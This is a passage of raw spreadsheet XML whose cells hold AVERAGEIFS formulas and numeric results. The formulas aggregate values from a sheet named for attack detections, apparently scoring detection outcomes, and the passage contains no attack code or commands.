        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0</v>
      </c>
      <c r="AK212" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AL212" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AM212" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0</v>
      </c>
      <c r="AN212" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0</v>
      </c>
      <c r="AO212" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0.0625</v>
      </c>
      <c r="AP212" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AQ212" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0</v>
      </c>
      <c r="AR212" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0</v>
      </c>
      <c r="AS212" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0.0625</v>
      </c>
      <c r="AT212" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AU212" s="271"/>
      <c r="AV212" s="271"/>
      <c r="AW212" s="271"/>
      <c r="AX212" s="271"/>
      <c r="AY212" s="271"/>
      <c r="AZ212" s="271"/>
      <c r="BA212" s="271"/>
      <c r="BB212" s="271"/>
      <c r="BC212" s="271"/>
      <c r="BD212" s="271"/>
      <c r="BE212" s="271"/>
      <c r="BF212" s="271"/>
      <c r="BG212" s="271"/>
      <c r="BH212" s="271"/>
      <c r="BI212" s="271"/>
      <c r="BJ212" s="271"/>
      <c r="BK212" s="271"/>
      <c r="BL212" s="271"/>
      <c r="BM212" s="271"/>
      <c r="BN212" s="271"/>
      <c r="BO212" s="271"/>
      <c r="BP212" s="271"/>
      <c r="BQ212" s="271"/>
      <c r="BR212" s="271"/>
      <c r="BS212" s="271"/>
      <c r="BT212" s="271"/>
      <c r="BU212" s="271"/>
      <c r="BV212" s="271"/>
      <c r="BW212" s="271"/>
      <c r="BX212" s="271"/>
      <c r="BY212" s="271"/>
      <c r="BZ212" s="271"/>
      <c r="CA212" s="271"/>
      <c r="CB212" s="271"/>
      <c r="CC212" s="271"/>
      <c r="CD212" s="271"/>
      <c r="CE212" s="271"/>
      <c r="CF212" s="271"/>
      <c r="CG212" s="271"/>
      <c r="CH212" s="271"/>
      <c r="CI212" s="271"/>
      <c r="CJ212" s="271"/>
      <c r="CK212" s="271"/>
      <c r="CL212" s="271"/>
      <c r="CM212" s="271"/>
      <c r="CN212" s="271"/>
      <c r="CO212" s="271"/>
      <c r="CP212" s="271"/>
      <c r="CQ212" s="271"/>
      <c r="CR212" s="271"/>
      <c r="CS212" s="271"/>
      <c r="CT212" s="271"/>
      <c r="CU212" s="271"/>
      <c r="CV212" s="271"/>
      <c r="CW212" s="271"/>
      <c r="CX212" s="271"/>
      <c r="CY212" s="271"/>
      <c r="CZ212" s="271"/>
      <c r="DA212" s="271"/>
      <c r="DB212" s="271"/>
      <c r="DC212" s="271"/>
      <c r="DD212" s="271"/>
      <c r="DE212" s="271"/>
      <c r="DF212" s="271"/>
      <c r="DG212" s="271"/>
      <c r="DH212" s="271"/>
      <c r="DI212" s="271"/>
      <c r="DJ212" s="271"/>
      <c r="DK212" s="271"/>
    </row>
    <row r="213">
      <c r="J213" s="20"/>
      <c r="K213" s="559" t="s">
        <v>2621</v>
      </c>
      <c r="L213" s="560">
        <f>L112</f>
        <v>190.5944205</v>
      </c>
      <c r="M213" s="561">
        <f>L109</f>
        <v>0.2301309595</v>
      </c>
      <c r="N213" s="562">
        <f t="shared" si="199"/>
        <v>190.3642895</v>
      </c>
      <c r="Q213" s="271"/>
      <c r="R213" s="510"/>
      <c r="S213" s="510"/>
      <c r="T213" s="510"/>
      <c r="U213" s="510"/>
      <c r="V213" s="510"/>
      <c r="W213" s="510"/>
      <c r="X213" s="271"/>
      <c r="Y213" s="271"/>
      <c r="Z213" s="271"/>
      <c r="AA213" s="271"/>
      <c r="AB213" s="271"/>
      <c r="AC213" s="271"/>
      <c r="AD213" s="271"/>
      <c r="AE213" s="271"/>
      <c r="AF213" s="271"/>
      <c r="AG213" s="271"/>
      <c r="AH213" s="352" t="s">
        <v>1903</v>
      </c>
      <c r="AI213" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ213" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>0</v>
      </c>
      <c r="AK213" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>1</v>
      </c>
      <c r="AL213" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>1</v>
      </c>
      <c r="AM213" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>0</v>
      </c>
      <c r="AN213" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>0</v>
      </c>
      <c r="AO213" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>1</v>
      </c>
      <c r="AP213" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>1</v>
      </c>
      <c r="AQ213" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>0</v>
      </c>
      <c r="AR213" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>0</v>
      </c>
      <c r="AS213" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>1</v>
      </c>
      <c r="AT213" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>1</v>
      </c>
      <c r="AU213" s="271"/>
      <c r="AV213" s="271"/>
      <c r="AW213" s="271"/>
      <c r="AX213" s="271"/>
      <c r="AY213" s="271"/>
      <c r="AZ213" s="271"/>
      <c r="BA213" s="271"/>
      <c r="BB213" s="271"/>
      <c r="BC213" s="271"/>
      <c r="BD213" s="271"/>
      <c r="BE213" s="271"/>
      <c r="BF213" s="271"/>
      <c r="BG213" s="271"/>
      <c r="BH213" s="271"/>
      <c r="BI213" s="271"/>
      <c r="BJ213" s="271"/>
      <c r="BK213" s="271"/>
      <c r="BL213" s="271"/>
      <c r="BM213" s="271"/>
      <c r="BN213" s="271"/>
      <c r="BO213" s="271"/>
      <c r="BP213" s="271"/>
      <c r="BQ213" s="271"/>
      <c r="BR213" s="271"/>
      <c r="BS213" s="271"/>
      <c r="BT213" s="271"/>
      <c r="BU213" s="271"/>
      <c r="BV213" s="271"/>
      <c r="BW213" s="271"/>
      <c r="BX213" s="271"/>
      <c r="BY213" s="271"/>
      <c r="BZ213" s="271"/>
      <c r="CA213" s="271"/>
      <c r="CB213" s="271"/>
      <c r="CC213" s="271"/>
      <c r="CD213" s="271"/>
      <c r="CE213" s="271"/>
      <c r="CF213" s="271"/>
      <c r="CG213" s="271"/>
      <c r="CH213" s="271"/>
      <c r="CI213" s="271"/>
      <c r="CJ213" s="271"/>
      <c r="CK213" s="271"/>
      <c r="CL213" s="271"/>
      <c r="CM213" s="271"/>
      <c r="CN213" s="271"/>
      <c r="CO213" s="271"/>
      <c r="CP213" s="271"/>
      <c r="CQ213" s="271"/>
      <c r="CR213" s="271"/>
      <c r="CS213" s="271"/>
      <c r="CT213" s="271"/>
      <c r="CU213" s="271"/>
      <c r="CV213" s="271"/>
      <c r="CW213" s="271"/>
      <c r="CX213" s="271"/>
      <c r="CY213" s="271"/>
      <c r="CZ213" s="271"/>
      <c r="DA213" s="271"/>
      <c r="DB213" s="271"/>
      <c r="DC213" s="271"/>
      <c r="DD213" s="271"/>
      <c r="DE213" s="271"/>
      <c r="DF213" s="271"/>
      <c r="DG213" s="271"/>
      <c r="DH213" s="271"/>
      <c r="DI213" s="271"/>
      <c r="DJ213" s="271"/>
      <c r="DK213" s="271"/>
    </row>
    <row r="214">
      <c r="K214" s="559" t="s">
        <v>2622</v>
      </c>
      <c r="L214" s="405">
        <f>M112</f>
        <v>406.6609951</v>
      </c>
      <c r="M214" s="336">
        <f>M109</f>
        <v>0.3886675449</v>
      </c>
      <c r="N214" s="562">
        <f t="shared" si="199"/>
        <v>406.2723276</v>
      </c>
      <c r="Q214" s="271"/>
      <c r="R214" s="510"/>
      <c r="S214" s="510"/>
      <c r="T214" s="510"/>
      <c r="U214" s="510"/>
      <c r="V214" s="510"/>
      <c r="W214" s="510"/>
      <c r="X214" s="271"/>
      <c r="Y214" s="271"/>
      <c r="Z214" s="271"/>
      <c r="AA214" s="271"/>
      <c r="AB214" s="271"/>
      <c r="AC214" s="271"/>
      <c r="AD214" s="271"/>
      <c r="AE214" s="271"/>
      <c r="AF214" s="271"/>
      <c r="AG214" s="271"/>
      <c r="AH214" s="352" t="s">
        <v>2335</v>
      </c>
      <c r="AI214" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ214" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK214" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL214" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM214" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN214" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO214" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP214" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ214" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR214" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS214" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT214" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU214" s="271"/>
      <c r="AV214" s="271"/>
      <c r="AW214" s="271"/>
      <c r="AX214" s="271"/>
      <c r="AY214" s="271"/>
      <c r="AZ214" s="271"/>
      <c r="BA214" s="271"/>
      <c r="BB214" s="271"/>
      <c r="BC214" s="271"/>
      <c r="BD214" s="271"/>
      <c r="BE214" s="271"/>
      <c r="BF214" s="271"/>
      <c r="BG214" s="271"/>
      <c r="BH214" s="271"/>
      <c r="BI214" s="271"/>
      <c r="BJ214" s="271"/>
      <c r="BK214" s="271"/>
      <c r="BL214" s="271"/>
      <c r="BM214" s="271"/>
      <c r="BN214" s="271"/>
      <c r="BO214" s="271"/>
      <c r="BP214" s="271"/>
      <c r="BQ214" s="271"/>
      <c r="BR214" s="271"/>
      <c r="BS214" s="271"/>
      <c r="BT214" s="271"/>
      <c r="BU214" s="271"/>
      <c r="BV214" s="271"/>
      <c r="BW214" s="271"/>
      <c r="BX214" s="271"/>
      <c r="BY214" s="271"/>
      <c r="BZ214" s="271"/>
      <c r="CA214" s="271"/>
      <c r="CB214" s="271"/>
      <c r="CC214" s="271"/>
      <c r="CD214" s="271"/>
      <c r="CE214" s="271"/>
      <c r="CF214" s="271"/>
      <c r="CG214" s="271"/>
      <c r="CH214" s="271"/>
      <c r="CI214" s="271"/>
      <c r="CJ214" s="271"/>
      <c r="CK214" s="271"/>
      <c r="CL214" s="271"/>
      <c r="CM214" s="271"/>
      <c r="CN214" s="271"/>
      <c r="CO214" s="271"/>
      <c r="CP214" s="271"/>
      <c r="CQ214" s="271"/>
      <c r="CR214" s="271"/>
      <c r="CS214" s="271"/>
      <c r="CT214" s="271"/>
      <c r="CU214" s="271"/>
      <c r="CV214" s="271"/>
      <c r="CW214" s="271"/>
      <c r="CX214" s="271"/>
      <c r="CY214" s="271"/>
      <c r="CZ214" s="271"/>
      <c r="DA214" s="271"/>
      <c r="DB214" s="271"/>
      <c r="DC214" s="271"/>
      <c r="DD214" s="271"/>
      <c r="DE214" s="271"/>
      <c r="DF214" s="271"/>
      <c r="DG214" s="271"/>
      <c r="DH214" s="271"/>
      <c r="DI214" s="271"/>
      <c r="DJ214" s="271"/>
      <c r="DK214" s="271"/>
    </row>
    <row r="215">
      <c r="K215" s="559" t="s">
        <v>2623</v>
      </c>
      <c r="L215" s="405">
        <f>N112</f>
        <v>1734.569727</v>
      </c>
      <c r="M215" s="336">
        <f>N109</f>
        <v>0.4401962768</v>
      </c>
      <c r="N215" s="562">
        <f t="shared" si="199"/>
        <v>1734.129531</v>
      </c>
      <c r="Q215" s="271"/>
      <c r="R215" s="510"/>
      <c r="S215" s="510"/>
      <c r="T215" s="510"/>
      <c r="U215" s="510"/>
      <c r="V215" s="510"/>
      <c r="W215" s="510"/>
      <c r="X215" s="271"/>
      <c r="Y215" s="271"/>
      <c r="Z215" s="271"/>
      <c r="AA215" s="271"/>
      <c r="AB215" s="271"/>
      <c r="AC215" s="271"/>
      <c r="AD215" s="271"/>
      <c r="AE215" s="271"/>
      <c r="AF215" s="271"/>
      <c r="AG215" s="271"/>
      <c r="AH215" s="352" t="s">
        <v>1983</v>
      </c>
      <c r="AI215" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ215" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK215" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL215" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM215" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN215" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO215" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP215" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ215" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR215" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS215" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT215" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU215" s="271"/>
      <c r="AV215" s="271"/>
      <c r="AW215" s="271"/>
      <c r="AX215" s="271"/>
      <c r="AY215" s="271"/>
      <c r="AZ215" s="271"/>
      <c r="BA215" s="271"/>
      <c r="BB215" s="271"/>
      <c r="BC215" s="271"/>
      <c r="BD215" s="271"/>
      <c r="BE215" s="271"/>
      <c r="BF215" s="271"/>
      <c r="BG215" s="271"/>
      <c r="BH215" s="271"/>
      <c r="BI215" s="271"/>
      <c r="BJ215" s="271"/>
      <c r="BK215" s="271"/>
      <c r="BL215" s="271"/>
      <c r="BM215" s="271"/>
      <c r="BN215" s="271"/>
      <c r="BO215" s="271"/>
      <c r="BP215" s="271"/>
      <c r="BQ215" s="271"/>
      <c r="BR215" s="271"/>
      <c r="BS215" s="271"/>
      <c r="BT215" s="271"/>
      <c r="BU215" s="271"/>
      <c r="BV215" s="271"/>
      <c r="BW215" s="271"/>
      <c r="BX215" s="271"/>
      <c r="BY215" s="271"/>
      <c r="BZ215" s="271"/>
      <c r="CA215" s="271"/>
      <c r="CB215" s="271"/>
      <c r="CC215" s="271"/>
      <c r="CD215" s="271"/>
      <c r="CE215" s="271"/>
      <c r="CF215" s="271"/>
      <c r="CG215" s="271"/>
      <c r="CH215" s="271"/>
      <c r="CI215" s="271"/>
      <c r="CJ215" s="271"/>
      <c r="CK215" s="271"/>
      <c r="CL215" s="271"/>
      <c r="CM215" s="271"/>
      <c r="CN215" s="271"/>
      <c r="CO215" s="271"/>
      <c r="CP215" s="271"/>
      <c r="CQ215" s="271"/>
      <c r="CR215" s="271"/>
      <c r="CS215" s="271"/>
      <c r="CT215" s="271"/>
      <c r="CU215" s="271"/>
      <c r="CV215" s="271"/>
      <c r="CW215" s="271"/>
      <c r="CX215" s="271"/>
      <c r="CY215" s="271"/>
      <c r="CZ215" s="271"/>
      <c r="DA215" s="271"/>
      <c r="DB215" s="271"/>
      <c r="DC215" s="271"/>
      <c r="DD215" s="271"/>
      <c r="DE215" s="271"/>
      <c r="DF215" s="271"/>
      <c r="DG215" s="271"/>
      <c r="DH215" s="271"/>
      <c r="DI215" s="271"/>
      <c r="DJ215" s="271"/>
      <c r="DK215" s="271"/>
    </row>
    <row r="216">
      <c r="K216" s="559" t="s">
        <v>2624</v>
      </c>
      <c r="L216" s="405">
        <f>K121</f>
        <v>75.29745389</v>
      </c>
      <c r="M216" s="336">
        <f>K118</f>
        <v>0.0499595818</v>
      </c>
      <c r="N216" s="562">
        <f t="shared" si="199"/>
        <v>75.24749431</v>
      </c>
      <c r="Q216" s="271"/>
      <c r="R216" s="510"/>
      <c r="S216" s="510"/>
      <c r="T216" s="510"/>
      <c r="U216" s="510"/>
      <c r="V216" s="510"/>
      <c r="W216" s="510"/>
      <c r="X216" s="271"/>
      <c r="Y216" s="271"/>
      <c r="Z216" s="271"/>
      <c r="AA216" s="271"/>
      <c r="AB216" s="271"/>
      <c r="AC216" s="271"/>
      <c r="AD216" s="271"/>
      <c r="AE216" s="271"/>
      <c r="AF216" s="271"/>
      <c r="AG216" s="271"/>
      <c r="AH216" s="352" t="s">
        <v>1999</v>
      </c>
      <c r="AI216" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ216" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK216" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL216" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM216" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN216" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO216" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP216" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ216" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR216" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS216" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT216" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU216" s="271"/>
      <c r="AV216" s="271"/>
      <c r="AW216" s="271"/>
      <c r="AX216" s="271"/>
      <c r="AY216" s="271"/>
      <c r="AZ216" s="271"/>
      <c r="BA216" s="271"/>
      <c r="BB216" s="271"/>
      <c r="BC216" s="271"/>
      <c r="BD216" s="271"/>
      <c r="BE216" s="271"/>
      <c r="BF216" s="271"/>
      <c r="BG216" s="271"/>
      <c r="BH216" s="271"/>
      <c r="BI216" s="271"/>
      <c r="BJ216" s="271"/>
      <c r="BK216" s="271"/>
      <c r="BL216" s="271"/>
      <c r="BM216" s="271"/>
      <c r="BN216" s="271"/>
      <c r="BO216" s="271"/>
      <c r="BP216" s="271"/>
      <c r="BQ216" s="271"/>
      <c r="BR216" s="271"/>
      <c r="BS216" s="271"/>
      <c r="BT216" s="271"/>
      <c r="BU216" s="271"/>
      <c r="BV216" s="271"/>
      <c r="BW216" s="271"/>
      <c r="BX216" s="271"/>
      <c r="BY216" s="271"/>
      <c r="BZ216" s="271"/>
      <c r="CA216" s="271"/>
      <c r="CB216" s="271"/>
      <c r="CC216" s="271"/>
      <c r="CD216" s="271"/>
      <c r="CE216" s="271"/>
      <c r="CF216" s="271"/>
      <c r="CG216" s="271"/>
      <c r="CH216" s="271"/>
      <c r="CI216" s="271"/>
      <c r="CJ216" s="271"/>
      <c r="CK216" s="271"/>
      <c r="CL216" s="271"/>
      <c r="CM216" s="271"/>
      <c r="CN216" s="271"/>
      <c r="CO216" s="271"/>
      <c r="CP216" s="271"/>
      <c r="CQ216" s="271"/>
      <c r="CR216" s="271"/>
      <c r="CS216" s="271"/>
      <c r="CT216" s="271"/>
      <c r="CU216" s="271"/>
      <c r="CV216" s="271"/>
      <c r="CW216" s="271"/>
      <c r="CX216" s="271"/>
      <c r="CY216" s="271"/>
      <c r="CZ216" s="271"/>
      <c r="DA216" s="271"/>
      <c r="DB216" s="271"/>
      <c r="DC216" s="271"/>
      <c r="DD216" s="271"/>
      <c r="DE216" s="271"/>
      <c r="DF216" s="271"/>
      <c r="DG216" s="271"/>
      <c r="DH216" s="271"/>
      <c r="DI216" s="271"/>
      <c r="DJ216" s="271"/>
      <c r="DK216" s="271"/>
    </row>
    <row r="217">
      <c r="K217" s="559" t="s">
        <v>2625</v>
      </c>
      <c r="L217" s="563">
        <f>L121</f>
        <v>1806.269128</v>
      </c>
      <c r="M217" s="564">
        <f>L118</f>
        <v>0.2298473484</v>
      </c>
      <c r="N217" s="562">
        <f t="shared" si="199"/>
        <v>1806.039281</v>
      </c>
      <c r="Q217" s="271"/>
      <c r="R217" s="510"/>
      <c r="S217" s="510"/>
      <c r="T217" s="510"/>
      <c r="U217" s="510"/>
      <c r="V217" s="510"/>
      <c r="W217" s="510"/>
      <c r="X217" s="271"/>
      <c r="Y217" s="271"/>
      <c r="Z217" s="271"/>
      <c r="AA217" s="271"/>
      <c r="AB217" s="271"/>
      <c r="AC217" s="271"/>
      <c r="AD217" s="271"/>
      <c r="AE217" s="271"/>
      <c r="AF217" s="271"/>
      <c r="AG217" s="271"/>
      <c r="AH217" s="352" t="s">
        <v>1971</v>
      </c>
      <c r="AI217" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ217" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK217" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL217" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM217" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN217" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO217" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP217" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ217" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR217" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS217" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT217" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU217" s="271"/>
      <c r="AV217" s="271"/>
      <c r="AW217" s="271"/>
      <c r="AX217" s="271"/>
      <c r="AY217" s="271"/>
      <c r="AZ217" s="271"/>
      <c r="BA217" s="271"/>
      <c r="BB217" s="271"/>
      <c r="BC217" s="271"/>
      <c r="BD217" s="271"/>
      <c r="BE217" s="271"/>
      <c r="BF217" s="271"/>
      <c r="BG217" s="271"/>
      <c r="BH217" s="271"/>
      <c r="BI217" s="271"/>
      <c r="BJ217" s="271"/>
      <c r="BK217" s="271"/>
      <c r="BL217" s="271"/>
      <c r="BM217" s="271"/>
      <c r="BN217" s="271"/>
      <c r="BO217" s="271"/>
      <c r="BP217" s="271"/>
      <c r="BQ217" s="271"/>
      <c r="BR217" s="271"/>
      <c r="BS217" s="271"/>
      <c r="BT217" s="271"/>
      <c r="BU217" s="271"/>
      <c r="BV217" s="271"/>
      <c r="BW217" s="271"/>
      <c r="BX217" s="271"/>
      <c r="BY217" s="271"/>
      <c r="BZ217" s="271"/>
      <c r="CA217" s="271"/>
      <c r="CB217" s="271"/>
      <c r="CC217" s="271"/>
      <c r="CD217" s="271"/>
      <c r="CE217" s="271"/>
      <c r="CF217" s="271"/>
      <c r="CG217" s="271"/>
      <c r="CH217" s="271"/>
      <c r="CI217" s="271"/>
      <c r="CJ217" s="271"/>
      <c r="CK217" s="271"/>
      <c r="CL217" s="271"/>
      <c r="CM217" s="271"/>
      <c r="CN217" s="271"/>
      <c r="CO217" s="271"/>
      <c r="CP217" s="271"/>
      <c r="CQ217" s="271"/>
      <c r="CR217" s="271"/>
      <c r="CS217" s="271"/>
      <c r="CT217" s="271"/>
      <c r="CU217" s="271"/>
      <c r="CV217" s="271"/>
      <c r="CW217" s="271"/>
      <c r="CX217" s="271"/>
      <c r="CY217" s="271"/>
      <c r="CZ217" s="271"/>
      <c r="DA217" s="271"/>
      <c r="DB217" s="271"/>
      <c r="DC217" s="271"/>
      <c r="DD217" s="271"/>
      <c r="DE217" s="271"/>
      <c r="DF217" s="271"/>
      <c r="DG217" s="271"/>
      <c r="DH217" s="271"/>
      <c r="DI217" s="271"/>
      <c r="DJ217" s="271"/>
      <c r="DK217" s="271"/>
    </row>
    <row r="218">
      <c r="K218" s="559" t="s">
        <v>2626</v>
      </c>
      <c r="L218" s="563">
        <f>M121</f>
        <v>2423.98002</v>
      </c>
      <c r="M218" s="564">
        <f>M118</f>
        <v>0.3781945885</v>
      </c>
      <c r="N218" s="562">
        <f t="shared" si="199"/>
        <v>2423.601825</v>
      </c>
      <c r="Q218" s="271"/>
      <c r="R218" s="510"/>
      <c r="S218" s="510"/>
      <c r="T218" s="510"/>
      <c r="U218" s="510"/>
      <c r="V218" s="510"/>
      <c r="W218" s="510"/>
      <c r="X218" s="271"/>
      <c r="Y218" s="271"/>
      <c r="Z218" s="271"/>
      <c r="AA218" s="271"/>
      <c r="AB218" s="271"/>
      <c r="AC218" s="271"/>
      <c r="AD218" s="271"/>
      <c r="AE218" s="271"/>
      <c r="AF218" s="271"/>
      <c r="AG218" s="271"/>
      <c r="AH218" s="352" t="s">
        <v>1201</v>
      </c>
      <c r="AI218" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ218" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK218" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL218" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM218" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN218" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO218" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP218" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ218" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR218" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS218" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT218" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU218" s="271"/>
      <c r="AV218" s="271"/>
      <c r="AW218" s="271"/>
      <c r="AX218" s="271"/>
      <c r="AY218" s="271"/>
      <c r="AZ218" s="271"/>
      <c r="BA218" s="271"/>
      <c r="BB218" s="271"/>
      <c r="BC218" s="271"/>
      <c r="BD218" s="271"/>
      <c r="BE218" s="271"/>
      <c r="BF218" s="271"/>
      <c r="BG218" s="271"/>
      <c r="BH218" s="271"/>
      <c r="BI218" s="271"/>
      <c r="BJ218" s="271"/>
      <c r="BK218" s="271"/>
      <c r="BL218" s="271"/>
